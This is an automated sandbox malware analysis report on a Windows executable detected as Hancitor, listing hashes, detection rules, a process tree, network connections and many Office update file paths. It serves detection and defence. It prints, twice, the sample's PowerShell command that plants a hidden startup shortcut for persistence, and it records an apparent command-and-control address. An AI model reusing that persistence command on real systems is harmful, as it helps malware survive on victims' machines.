
Windows Analysis Report
sBvrNv0wtb.exe

Overview

General Information

Sample name: sBvrNv0wtb.exe (renamed because original name is a hash value)
Original sample name: dc1bcd4074651a3795b8b21e93223537f5067890f1ac68e9f15d3a3dc7dd3056.exe
Analysis ID: 1637507
MD5: da61dc10ea55e0c0376fb23ce9907976
SHA1: ce3595e012c7106d3e9ffcea954ecb342efddcd5
SHA256: dc1bcd4074651a3795b8b21e93223537f5067890f1ac68e9f15d3a3dc7dd3056
Tags: exe, NATIONALCARECONSORTIUMLTD, user-JAMESWT_MHT

Detection

Hancitor
Score: 48
Range: 0 - 100
Confidence: 100%

Compliance

Score: 64
Range: 0 - 100

Signatures

Yara detected Hancitor
Powershell creates an autostart link
Query firmware table information (likely to detect VMs)
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • sBvrNv0wtb.exe (PID: 7632 cmdline: "C:\Users\user\Desktop\sBvrNv0wtb.exe" MD5: DA61DC10EA55E0C0376FB23CE9907976)
    • 872C.tmp (PID: 7692 cmdline: C:\Users\user\AppData\Local\Temp\872C.tmp MD5: 29D5D38D66B57BBC99F833265592278F)
      • 872C.tmp (PID: 7708 cmdline: 872C.tmp RELAUNCHED MD5: 29D5D38D66B57BBC99F833265592278F)
        • OfficeClickToRun.exe (PID: 1332 cmdline: OfficeClickToRun.exe platform=x86 culture=en-us productstoadd=O365HomePremRetail.16_en-us_x-none cdnbaseurl=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 baseurl=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 version=16.0.18526.20168 mediatype=CDN sourcetype=CDN O365HomePremRetail.excludedapps=groove bitnessmigration=False deliverymechanism=492350f6-3a01-4f97-b9c0-c7c6ddf67d60 flt.useoutlookshareaddon=unknown flt.useofficehelperaddon=unknown uninstallcentennial=True scenario=CLIENTUPDATE MD5: 75F42872C0302D36A1E3BB5C7928FC02)
        • OfficeClickToRun.exe (PID: 4892 cmdline: OfficeClickToRun.exe platform=x86 culture=en-us productstoadd=O365HomePremRetail.16_en-us_x-none cdnbaseurl.16=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 baseurl.16=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 version.16=16.0.18526.20168 mediatype.16=CDN sourcetype.16=CDN O365HomePremRetail.excludedapps.16=groove bitnessmigration=False deliverymechanism=492350f6-3a01-4f97-b9c0-c7c6ddf67d60 flt.useoutlookshareaddon=unknown flt.useofficehelperaddon=unknown uninstallcentennial=True MD5: 33F980B29BC3D0B5B536646573D8A63F)
    • 918D.tmp (PID: 7772 cmdline: C:\Users\user\AppData\Local\Temp\918D.tmp MD5: 11564DDB77680B81999B6837CEEF3105)
      • powershell.exe (PID: 1532 cmdline: "powershell" -Command " $StartupFolder = [System.Environment]::GetFolderPath('Startup') $ExePath = 'C:\Users\Public\Music\script\918D.tmp' $ShortcutPath = Join-Path -Path $StartupFolder -ChildPath 'AsMus.lnk' $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut($ShortcutPath) $Shortcut.TargetPath = $ExePath $Shortcut.WorkingDirectory = Split-Path -Parent $ExePath $Shortcut.WindowStyle = 7 $Shortcut.Description = 'AsMus' $Shortcut.Save() " MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • OpenWith.exe (PID: 2752 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Hancitor | Hancitor (aka Chanitor) emerged in 2013 and spread via social engineering techniques, mainly through phishing mails embedded with a malicious link and weaponized Microsoft Office documents containing a malicious macro. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: sBvrNv0wtb.exe PID: 7632 | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |

    System Summary

    Source: Process started (three rule matches on the same event)
    Authors:
      • Thomas Patzke
      • Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
      • Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
    Data:
      Command, CommandLine, ProcessCommandLine: "powershell" -Command " $StartupFolder = [System.Environment]::GetFolderPath('Startup') $ExePath = 'C:\Users\Public\Music\script\918D.tmp' $ShortcutPath = Join-Path -Path $StartupFolder -ChildPath 'AsMus.lnk' $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut($ShortcutPath) $Shortcut.TargetPath = $ExePath $Shortcut.WorkingDirectory = Split-Path -Parent $ExePath $Shortcut.WindowStyle = 7 $Shortcut.Description = 'AsMus' $Shortcut.Save() "
      CommandLine|base64offset|contains: *&
      Image, NewProcessName, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      ParentCommandLine, ParentImage: C:\Users\user\AppData\Local\Temp\918D.tmp
      ParentProcessId: 7772
      ParentProcessName: 918D.tmp
      ProcessId: 1532
      ProcessName: powershell.exe

    Source: File created (two rule matches on the same event)
    Authors:
      • Christopher Peacock '@securepeacock', SCYTHE
      • Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
    Data:
      EventID: 11
      Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      ProcessId: 1532
      TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AsMus.lnk

    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-03-13T17:18:18.388255+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 54614 | 13.107.246.67 | 443 | TCP
    2025-03-13T17:18:26.520975+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 54619 | 13.107.246.67 | 443 | TCP


    Location Tracking

    Source: Yara match
    File source: Process Memory Space: sBvrNv0wtb.exe PID: 7632, type: MEMORYSTR

    Compliance

    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.lv-lv.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ms-my.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.nb-no.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.nl-nl.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.pl-pl.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.pt-br.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.pt-pt.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ro-ro.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ru-ru.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sk-sk.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sl-si.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sr-latn-rs.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sv-se.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.th-th.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.tr-tr.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.uk-ua.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.vi-vn.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.zh-cn.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.zh-tw.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RUI.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\ClientCapabilities.jsonJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\ClientEventLogMessages.manJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\concrt140.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\FrequentOfficeUpdateSchedule.xmlJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\i640.cab.catJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\i640.hashJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\InspectorOfficeGadget.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\IntegratedOffice.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\inventory.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\manageability.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\MavInject32.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\msix.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\msvcp140.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeC2RClient.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeC2RCom.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeClickToRun.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\officeinventory.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeOEMPlugin.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\officesvcmgr.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\officesvcmgrschedule.xmlJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\offreg.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\policy.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\PushRegistrationTask.xmlJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\repoman.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\ServiceWatcherSchedule.xmlJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\SharedPerformance.manJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\SubsystemController.manJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\ucrtbase.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\vccorlib140.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\vcruntime140.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\vcruntime140_1.dllJump to behavior
    Source: sBvrNv0wtb.exeStatic PE information: certificate valid
    Source: unknownHTTPS traffic detected: 13.107.246.67:443 -> 192.168.2.6:54614 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.67:443 -> 192.168.2.6:54619 version: TLS 1.2
    Source: sBvrNv0wtb.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: OfficeClickToRun.exe, 00000006.00000003.2052145588.00000248C2BE9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015189380.00000248C2BBE000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051796061.00000248C2BC9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053954532.00000248C2BFB000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: d:\dbs\el\omr\target\x86\ship\click2run\en-us\SetupBootstrapper.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmp
    Source: Binary string: d:\dbs\el\omr\target\x86\ship\click2run\en-us\SetupBootstrapper.pdb source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmp
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: OfficeClickToRun.exe, 00000006.00000003.2052145588.00000248C2BE9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015189380.00000248C2BBE000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051796061.00000248C2BC9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053954532.00000248C2BFB000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rekk.pdb source: sBvrNv0wtb.exe, 00000000.00000003.1313913322.000001972756D000.00000004.00000020.00020000.00000000.sdmp, sBvrNv0wtb.exe, 00000000.00000003.1347329405.000001972797A000.00000004.00000020.00020000.00000000.sdmp, 918D.tmp, 00000004.00000000.1346823200.00007FF7A9234000.00000002.00000001.01000000.00000006.sdmp
    Source: global trafficTCP traffic: 192.168.2.6:49698 -> 141.98.10.54:5677
    Source: global trafficTCP traffic: 192.168.2.6:54520 -> 1.1.1.1:53
    Source: Joe Sandbox ViewIP Address: 13.107.246.67 13.107.246.67
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:54614 -> 13.107.246.67:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:54619 -> 13.107.246.67:443
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /rules/officeclicktorun.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.18526; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/officec2rclient.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.18526; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://127.0.0.1:13556/DataInsiderSlabBehaviorSessionInsiderSlabBehaviorReportedStateInsiderSlabBeha
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
    Source: 872C.tmp, 00000003.00000003.1389030539.0000000003CF3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388768349.0000000003CD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.veris
